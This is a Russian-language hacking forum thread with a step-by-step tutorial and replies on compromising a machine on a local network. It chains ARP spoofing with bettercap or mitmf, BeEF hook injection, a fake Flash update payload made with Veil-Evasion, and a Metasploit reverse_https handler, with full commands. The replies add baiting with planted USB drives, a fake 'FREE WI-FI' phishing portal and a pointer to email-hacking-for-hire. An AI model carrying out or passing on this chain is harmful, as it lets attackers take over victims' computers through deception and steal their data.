Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ (https://forum.antichat.xyz/threads/557819/)
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

https://forum.antichat.xyz/attachments/4766852/img_43580cc379.png

лечиться это следующей заплаткой
easy_install -U pip

pip install Twisted==15.5.0

Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/
./beef

https://forum.antichat.xyz/attachments/4766852/img_7a66736292.png

Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес

http://localhost:3000/ui/authentication

Login:beef
Pasword:beef

https://forum.antichat.xyz/attachments/4766852/img_73bb3fc8c5.png

после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.

https://forum.antichat.xyz/attachments/4766852/1111.png

2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js"

https://forum.antichat.xyz/attachments/4766852/img_b850da9372.png

где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!

Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

https://forum.antichat.xyz/attachments/4766852/img_ad1ac864e3.png

Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url http://192.168.0.102:3000/hook.js

wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командойroute -n

https://forum.antichat.xyz/attachments/4766852/img_6777ac133d.png

Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ (https://forum.antichat.xyz/threads/557819/)
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

python -m SimpleHTTPServer 8081
консоль не закрываем!

Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

Для тех кто не ищет легких путей:
запускаем метасплойт командой:msfconsole
далее вводим:

use multi/handler
set payload windows/meterpreter/reverse_https

set LHOST 192.168.0.102 (свой внутренний IP )
set LPORT 4444(вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

https://forum.antichat.xyz/attachments/4766852/img_76f2d27b1b.png

Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
http://192.168.0.102:3000/adobe/flash_update.png
http://192.168.0.102:8081/flash_update12.exe

https://forum.antichat.xyz/attachments/4766852/img_cea3cada52.png

Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.

На этом пока всё, спасибо за внимание.

Очешуенно же)

Давно сижу на форуме, всем спасибо, крайне приятно вас читать!

лайк! мне было впадлу писать об этой связке )))) ты молодец. С меня репост.

Отличная статья, спасибо!

Познавательно, буду пробовать)Благодарствую. Доучиться бы до момента когда сам смогу все это придумывать,находить.

Что за mitmf? у меня bettercap не пашет, ошибка такая "undefined method 'arp_opcode" for nil:NilClass" Если поможете буду благодарен!

Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.

kot-gor сказал(а):

Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.


попробую, что выйдет отпишу. благодарю!

Knife сказал(а):

За пределами локальной сети эта связка неосуществима получается?


За пределами локальной сети другая связка, уязвимость xss по другому немного эксплуатируется..здесь я показал самый простой пример.

Lamerman сказал(а):

Вопрос по Beef

Код:



http://xxx.xxx.xxx.xxx:3000/hook.js


вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.


если в браузере..то скорее всего у вас не запустился сервер на 3000 порту.

Спасибо за интересную статью.

можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает

Lamerman сказал(а):

Координальное решение =) Ради интереса, я скачал beef с гитхаба и поставил его - результат тот же, видимо что то не хватает ему для успешной работы.


У вас скорее всего нарушены зависимости библиотек

переустановка оси.

Нехватило места на 8 гиговой флехе для установки обновлений персистенс раздел создал на ней все б нормально, только очень странно что 4 гига кончаются после скачивания мб 500... то есть скачал программу с этого "курса" установил и места почти не осталось...как можно проверить сколько места на зашифрованном разделе?в gparted показывает что то около 4 гигов насколько я помню, а так чет кажется меньше. Могут ли обновы в 3 -4 гига уложится?или место больше нужно?

Спасибо за статью) Дополню пожалуй коротким своим видосом про интеграцию BeeF и Metasploit
Возможно пригодится

Все опробованно, доступно и понятно, еще раз спасибо.
Подскажите, где можно покурить про способы доставке полезной нагрузки на целевой хост.
И оффтоп, может кто-нибудь подскажет, бескрайние просторы пестрят объявлениями о взломе почтовых ящиков типа gmail (визуально не лохотрон, т.к. ресурсы с такими объявлениями достойны уважения и врятли позволят себе постить разводки), как это вообще возможно, ведь это не подбор и не взлом хоста с которого клиент посещает ресурс, неужели рассылка писем с просьбой ввести пароль
Кстати обратил внимание на то, что одним из важных условий является не обращение к нескольким ребятам для одновременного взлома.

Фишинг имееет место быть., как один из вариантов ,Что касается о способах доставки полезной нагрузки , то на этом форуме информации предостаточно.

krylovlf сказал(а):

зломе почтовых ящиков типа gmail (визуально не лохотрон, т.к. ресурсы с такими объявлениями достойны уважения и врятли позволят себе постить разводки)



Советую к прочтениюВзлом почты на заказ - как действует исполнитель (https://forum.antichat.xyz/threads/558856/)

про доставку на целевй хост - можно воспользоваться старыми методами в нектоорых случаях аля забыть диск в нужном месте с надписю маркером Мои фото Маша.М или выслать подарочную флешку на 256 мб забрендированную под фирменную.

ghostphisher сказал(а):

забыть диск и выслать флешку


Ну это тоже социалка, мне бы хотелось потестить методы получения сессии через уязвимости на целевой машине, которые исключают адекватное или неадекватное поведение конечного пользователя, метод с flash крайне понравился, но это 50/50, все зависит от чайниковости пользователя.

А зачем вообще mitmf или bettercap прикручивать?! Взять JS'ник и сверстать прямо на форму. service apache2 start. И всё, Далее о Veil Evaison - к сожалению проект сей исчерпал себя и палится всем, чем только можно даже браузером хрома. Ну и в довесок, не проще ли юзать Java applets? А в целом статья очень даже хороша.

Ах да всё это прекрасно работает не в локалке, если белый ip.

SooLFaa сказал(а):

А зачем вообще mitmf или bettercap прикручивать?! Взять JS'ник и сверстать прямо на форму. service apache2 start. И всё, Далее о Veil Evaison - к сожалению проект сей исчерпал себя и палится всем, чем только можно даже браузером хрома. Ну и в довесок, не проще ли юзать Java applets? А в целом статья очень даже хороша.

Ах да всё это прекрасно работает не в локалке, если белый ip.


в локалке тоже прекрасно все работает , скажу более эта техника рассматривалась именно для сегмента локальной сети, поэтому и применяется mitmf или bettercap..Если рассматривать внешнюю сеть , то да , нужен белый ip, и немного по другому все сделать...

AlekseyM сказал(а):

ребят, я может еще не особо силен в терминологии... но правильно ли я понимаю: белый ip - это статический ip от провайдера за который приходится доплачивать в виде 100рЭ.... Или же это какой-то другой ip?
з,Ы, статья супер! будем учиться)


Белый ип тот что видно из интернета.

СОбирался писать подобное но в качестве проги для лже обновления юзать пэинт

Lamerman сказал(а):

Ничего конечно сказать не хочу плохого, но может кому полезно будет. Именно с Пэррот ОС я стал испытывать такие проблемы, и не только с beef, SET , другие приложения. В кали - все стабильно, в Пэррот как то все шатко =) Сейчас проверили на 4 машинах со свежей установкой Кали - все четко, поставил Пэррот на другую тачку - тоже самое - не завелось =) Так то как то =)



Kali Linux конкретно заточен для пентестов и там почти все работает без бубнов и танцов в отличии от других ОС...

Air7771 сказал(а):

Kali Linux конкретно заточен для пентестов и там почти все работает без бубнов и танцов в отличии от других ОС...


Parrot OS тоже как бы заточен. Даже одни и те же репы для обновления системы. Тут скорее дело в сырости Parrot - разрабочики пытась решить одну задачу, нанесли ущерб другой. Пэррот идет по пути легкости и скорости в противовес Кали, у которой аппетиты с каждым релизом все больше и больше.

Добавлено 05 марта

Beef-xss + wifiphisher - очень отличная вариация.
#wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login <--- тут специально сформированный файл, вернее отредактированный index.html , в который вставлен скрипт биф
После запуска и коннекта ( если этой iphone то вообще хорошо, так как нажав на название сети и выбрав подключиться, на смарте АВТОМАТИЧЕСКИ вспылвает окно ( фейковое ) и стартует скрипт) на Андроиде надо после покдлючения браузер запускать.
Так вот, почему то срабатывает 1 раз из 20, так как после запуска wifiphisher beef отваливается, причем сканом видно 3000 порт открыт, но нет связи. Гасим фишер, убиваем процесс, далее service beef-xss restart и вновь все ок, старутем фишер и тут как карта ляжет. Кто то может прокоментировать ситуацию? так раз 20-30 сделаешь и опять вроде ловит.

sdfsd сказал(а):

8081/flash_update12.exe --это TOT экзешник, который сгенерировал VEIL ?


Да

Не совсем понял,для чего тут используется BeeF. Предположим мы подняли сервер,сгенерили нагрузку (js),запустили перенаправление траффика в bettercap и ловим сессию в MSF. Что в этой связке делает BeeF ?

а вы попробуйте сделать как вы говорили, и сделать как я описал, и все сами поймете. тем более я в статье описал для чего нужен Beef и что он делает.

Читайте внимательно статью..

ghostik сказал(а):

Я читал там только с експлойта, а мне нужно своего трояна


там все подробно расписано, вы можете любым инструментом создать полезную нагрузку, и потом из этой папки где она создана запускаете сервер.
python -m SimpleHTTPServer 8081

если он запустит полезную нагрузку..то закрыта страница или открыта, значение не имеет..

ну это стандартная защита, даже на нормальные файлы так ругается.

Это не просто социальная инженерия)) Это навыки цифрового иллюзиониста, мать его!

На форумх вообще не сижу, считаю их бесполезной тратой времени...
Но кодибай меня радует!
Всем добра!